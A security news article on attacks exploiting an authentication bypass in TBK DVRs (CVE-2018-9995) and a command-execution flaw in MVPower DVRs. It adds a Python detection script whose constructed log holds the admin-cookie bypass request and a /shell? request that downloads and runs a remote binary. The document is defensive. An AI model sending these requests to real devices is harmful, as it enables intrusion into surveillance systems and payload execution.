Researchers have discovered an unpatched authentication bypass vulnerability in TBK DVR video recording devices. Threat actors have reportedly exploited the bug to steal sensitive footage from corporate networks that use the flawed devices.
A recent surge of attackers has also leveraged the publicly available PoC exploit to target internet-exposed devices.
TBK's website says its products are deployed in organisations across sectors such as retail, banking, and government. The researchers identified the flaw as CVE-2018-9995, a critical authentication bypass that could give remote attackers initial access to a target network.
The vulnerability carries a CVSS score of 9.8 out of 10. It stems from an error in how the DVR handles a specially crafted HTTP cookie: a remote attacker can use the cookie to bypass authentication and gain admin-level privileges, including access to the camera video feeds.
Numerous threat actors are flocking to the flawed TBK DVR devices to carry out attacks.
Researchers recently recorded over 50,000 attack attempts (unique IPS detections) against TBK DVR devices in the past months. The vulnerability affects the TBK DVR4216 and DVR4104 product lines. These products have also been rebranded and are sold under the names QSee, Pulnix, Night OWL, DVR Login, CeNova, XVR 5 in 1, MDVR Login, Securus, HVR Login, and Novo.
A separate researcher has also noticed increased attack attempts against MVPower CCTV DVR models, in addition to TBK DVRs. Threat actors are leveraging a remote code execution flaw in MVPower models that allows unauthenticated command execution via crafted HTTP requests. Attackers are still exploiting the vulnerability despite its age, about six years after its discovery.
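As an added example (not code from the article or from the researchers it cites), the following Python rules flag the request patterns behind both bugs in a constructed request log, the kind of signature an IPS detection for these attacks would carry. The article only says "specially crafted HTTP cookie"; the cookie value `uid=admin` and the `/device.rsp?opt=user&cmd=list` user-listing request come from the publicly documented PoC for CVE-2018-9995, and the MVPower command execution goes through an unauthenticated `/shell?` endpoint. The log format, IP addresses and requests are constructed for illustration.

```python
"""Detection rules for the two DVR attack patterns discussed above (added example)."""
import re
from typing import Dict, List, Optional

# Constructed sample request log (not real traffic), one request per line:
#   <client-ip> <method> <path> <cookie-header-or-dash>
SAMPLE_LOG = """\
203.0.113.10 GET /device.rsp?opt=user&cmd=list uid=admin
198.51.100.7 GET /index.html sessionid=3f2a
203.0.113.11 GET /shell?cd+/tmp;wget+http://203.0.113.99/bin;sh+bin -
198.51.100.9 POST /login.rsp -
203.0.113.12 GET /device.rsp?opt=user&cmd=list lang=en;uid=ADMIN
"""

# CVE-2018-9995: the public PoC sends the cookie "uid=admin" to make the DVR treat the
# client as the admin user. Match it as a whole cookie name/value pair, case-insensitive,
# so that trivially re-cased variants are still caught.
COOKIE_BYPASS_RE = re.compile(r"(^|;\s*)uid=admin(\s*;|$)", re.IGNORECASE)

# MVPower DVR: any request to /shell? carries a shell command that the device runs
# without authentication, so the path prefix alone is the signal.
MVPOWER_SHELL_RE = re.compile(r"^/shell\?")


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one constructed log line into its fields; return None on malformed input."""
    parts = line.strip().split(" ", 3)
    if len(parts) != 4:
        return None
    ip, method, path, cookie = parts
    return {"ip": ip, "method": method, "path": path, "cookie": "" if cookie == "-" else cookie}


def classify(entry: Dict[str, str]) -> Optional[str]:
    """Return the matching rule name, or None if the request looks benign."""
    # The cookie is the trigger, so match it on any path. /device.rsp is also served to
    # legitimate sessions, which is why the path alone is not a signal for this rule.
    if COOKIE_BYPASS_RE.search(entry["cookie"]):
        return "CVE-2018-9995 cookie auth bypass"
    if MVPOWER_SHELL_RE.search(entry["path"]):
        return "MVPower DVR unauthenticated /shell command execution"
    return None


def scan_log(text: str) -> List[Dict[str, str]]:
    """Run both rules over a log and return one hit per flagged request."""
    hits = []
    for raw in text.splitlines():
        entry = parse_line(raw)
        if entry is None:
            continue
        rule = classify(entry)
        if rule is not None:
            hits.append({"ip": entry["ip"], "path": entry["path"], "rule": rule})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["ip"]}  {hit["rule"]}  {hit["path"]}')
```

Run against the constructed log this flags three of the five requests: the two `uid=admin` cookie variants and the `/shell?` download-and-execute request. A device that is still exposed will keep generating these hits, since neither vendor has shipped a fix; the value of the rule is in spotting which source addresses are probing and which DVRs on the network are still reachable from them.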
Thousands of vulnerable DVR devices of different brands are being exploited by threat actors using publicly available PoC code. The device manufacturers have not addressed these vulnerabilities, leaving all owners susceptible to attack.
Organisations running these flawed surveillance systems should replace them with a more secure, supported model; until then, the devices should not be reachable from the internet.